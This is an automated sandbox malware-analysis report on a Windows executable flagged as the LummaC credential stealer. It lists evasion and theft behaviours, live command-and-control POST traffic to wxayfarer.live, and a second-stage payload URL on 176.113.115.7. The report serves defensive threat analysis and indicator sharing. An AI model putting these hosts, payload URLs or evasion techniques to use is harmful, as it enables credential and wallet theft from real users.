Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
ASIr1Bo2x9.exe

Overview

General Information

Sample name:ASIr1Bo2x9.exe
renamed because original name is a hash value
Original sample name:f9915de2e2ca00d8d19a8d021b433926.exe
Analysis ID:1648110
MD5:f9915de2e2ca00d8d19a8d021b433926
SHA1:c01697bdad14b649af9616304f356fe04d0258d8
SHA256:f81ed393ec7b3eec60ef2b2d01b03468c38e968e1140ed060e80bdcd859be802
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • ASIr1Bo2x9.exe (PID: 7588 cmdline: "C:\Users\user\Desktop\ASIr1Bo2x9.exe" MD5: F9915DE2E2CA00D8D19A8D021B433926)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-03-25T14:59:18.501983+010020283713Unknown Traffic192.168.2.449723104.21.80.1443TCP
    2025-03-25T14:59:21.115173+010020283713Unknown Traffic192.168.2.449724104.21.80.1443TCP
    2025-03-25T14:59:23.183594+010020283713Unknown Traffic192.168.2.449725104.21.80.1443TCP
    2025-03-25T14:59:24.583046+010020283713Unknown Traffic192.168.2.449726104.21.80.1443TCP
    2025-03-25T14:59:27.097605+010020283713Unknown Traffic192.168.2.449727104.21.80.1443TCP
    2025-03-25T14:59:28.417307+010020283713Unknown Traffic192.168.2.449728104.21.80.1443TCP
    2025-03-25T14:59:30.257214+010020283713Unknown Traffic192.168.2.449729104.21.80.1443TCP

    Joe Sandbox Signatures

    • AV Detection
    • Compliance
    • Networking
    • System Summary
    • Data Obfuscation
    • Boot Survival
    • Hooking and other Techniques for Hiding and Protection
    • Malware Analysis System Evasion
    • Anti Debugging
    • HIPS / PFW / Operating System Protection Evasion
    • Language, Device and Operating System Detection
    • Lowering of HIPS / PFW / Operating System Security Settings
    • Stealing of Sensitive Information
    • Remote Access Functionality

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: ASIr1Bo2x9.exeAvira: detected
    Source: https://wxayfarer.live/ALosnz6/DAvira URL Cloud: Label: malware
    Source: http://176.113.115.7:80/mine/random.exeAvira URL Cloud: Label: malware
    Source: https://wxayfarer.live/ALosnzNpAvira URL Cloud: Label: malware
    Source: https://wxayfarer.live/$~Avira URL Cloud: Label: malware
    Source: http://176.113.115.7/mine/random.exe.Avira URL Cloud: Label: malware
    Source: https://wxayfarer.live/ALosnzl9Avira URL Cloud: Label: malware
    Source: https://wxayfarer.live:443/ALosnzAvira URL Cloud: Label: malware
    Source: https://wxayfarer.live/ALosnzeAvira URL Cloud: Label: malware
    Source: https://wxayfarer.live/ALosnzcAvira URL Cloud: Label: malware
    Source: ASIr1Bo2x9.exeVirustotal: Detection: 58%Perma Link
    Source: ASIr1Bo2x9.exeReversingLabs: Detection: 69%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: ASIr1Bo2x9.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49723 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49724 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49725 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49726 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49727 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49728 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49729 version: TLS 1.2
    Source: Joe Sandbox ViewIP Address: 176.113.115.7 176.113.115.7
    Source: Joe Sandbox ViewIP Address: 176.113.115.7 176.113.115.7
    Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
    Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49728 -> 104.21.80.1:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49725 -> 104.21.80.1:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49726 -> 104.21.80.1:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49724 -> 104.21.80.1:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49729 -> 104.21.80.1:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49723 -> 104.21.80.1:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49727 -> 104.21.80.1:443
    Source: global trafficHTTP traffic detected: POST /ALosnz HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 51Host: wxayfarer.live
    Source: global trafficHTTP traffic detected: POST /ALosnz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9zdQGWOYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 19571Host: wxayfarer.live
    Source: global trafficHTTP traffic detected: POST /ALosnz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Mb46dE8tQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 8733Host: wxayfarer.live
    Source: global trafficHTTP traffic detected: POST /ALosnz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QzbfvKAlxzljv2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 20411Host: wxayfarer.live
    Source: global trafficHTTP traffic detected: POST /ALosnz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=vAU7SSh5bM0fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 2322Host: wxayfarer.live
    Source: global trafficHTTP traffic detected: POST /ALosnz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Or6Sl54ft9x4ECG6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 585900Host: wxayfarer.live
    Source: global trafficHTTP traffic detected: POST /ALosnz HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 89Host: wxayfarer.live
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficDNS traffic detected: DNS query: wxayfarer.live
    Source: unknownHTTP traffic detected: POST /ALosnz HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 51Host: wxayfarer.live
    Source: ASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000DF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/
    Source: ASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000DF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7//
    Source: ASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/mine/ran
    Source: ASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000DF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/mine/random.exe
    Source: ASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/mine/random.exe.
    Source: ASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000DF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7:80/mine/random.exe
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1349659412.0000000005917000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1349659412.0000000005917000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1349659412.0000000005917000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1349659412.0000000005917000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1349659412.0000000005917000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1349659412.0000000005917000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1349659412.0000000005917000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1349659412.0000000005917000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1349659412.0000000005917000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1349659412.0000000005917000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1349659412.0000000005917000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1351491258.000000000598B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1351491258.000000000598B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1351491258.000000000598B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1351491258.000000000598B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1351491258.000000000598B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1351491258.000000000598B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1351491258.000000000598B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1392937738.0000000000DFF000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1385837903.0000000000DFF000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000DF2000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1299973451.0000000000D74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wxayfarer.live/
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1384924260.0000000000DFF000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1392937738.0000000000DFF000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1385837903.0000000000DFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wxayfarer.live/$~
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1375125685.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1325302395.0000000000E11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wxayfarer.live/ALosnz
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1408503369.0000000000D89000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000002.1629043916.0000000000D89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wxayfarer.live/ALosnz6/D
    Source: ASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000DF2000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1392937738.0000000000DF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wxayfarer.live/ALosnzNp
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1325142805.0000000000E11000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1325382510.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1325302395.0000000000E11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wxayfarer.live/ALosnzc
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1392893647.0000000000E11000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1408641390.0000000000E13000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000E11000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1385095106.0000000000E13000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1386096339.0000000000E13000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1408441458.0000000000E11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wxayfarer.live/ALosnze
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1384966149.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1375125685.0000000000D8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wxayfarer.live/ALosnzl9
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1325200671.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1375125685.0000000000D8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wxayfarer.live:443/ALosnz
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49723 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49724 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49725 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49726 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49727 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49728 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49729 version: TLS 1.2

    System Summary

    barindex
    Source: ASIr1Bo2x9.exeStatic PE information: section name:
    Source: ASIr1Bo2x9.exeStatic PE information: section name: .idata
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00D8E0D40_3_00D8E0D4
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00D8E0D40_3_00D8E0D4
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00D8E0990_3_00D8E099
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00D8E0990_3_00D8E099
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00D8E0D40_3_00D8E0D4
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00D8E0D40_3_00D8E0D4
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00D8E0990_3_00D8E099
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00D8E0990_3_00D8E099
    Source: ASIr1Bo2x9.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: ASIr1Bo2x9.exeStatic PE information: Section: ZLIB complexity 0.9980898008241759
    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/2
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: ASIr1Bo2x9.exe, 00000000.00000003.1306113639.0000000005871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: ASIr1Bo2x9.exeVirustotal: Detection: 58%
    Source: ASIr1Bo2x9.exeReversingLabs: Detection: 69%
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile read: C:\Users\user\Desktop\ASIr1Bo2x9.exeJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: webio.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: ASIr1Bo2x9.exeStatic file information: File size 2990592 > 1048576
    Source: ASIr1Bo2x9.exeStatic PE information: Raw size of cwkdpops is bigger than: 0x100000 < 0x2a8e00

    Data Obfuscation

    barindex
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeUnpacked PE file: 0.2.ASIr1Bo2x9.exe.eb0000.0.unpack :EW;.rsrc:W;.idata :W;cwkdpops:EW;sifugpmh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;cwkdpops:EW;sifugpmh:EW;.taggant:EW;
    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
    Source: ASIr1Bo2x9.exeStatic PE information: real checksum: 0x2e391a should be: 0x2db05d
    Source: ASIr1Bo2x9.exeStatic PE information: section name:
    Source: ASIr1Bo2x9.exeStatic PE information: section name: .idata
    Source: ASIr1Bo2x9.exeStatic PE information: section name: cwkdpops
    Source: ASIr1Bo2x9.exeStatic PE information: section name: sifugpmh
    Source: ASIr1Bo2x9.exeStatic PE information: section name: .taggant
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00DFCDF2 push edi; ret 0_3_00DFCDF3
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00DFCDF2 push edi; ret 0_3_00DFCDF3
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00DFCDF2 push edi; ret 0_3_00DFCDF3
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00DFCDF2 push edi; ret 0_3_00DFCDF3
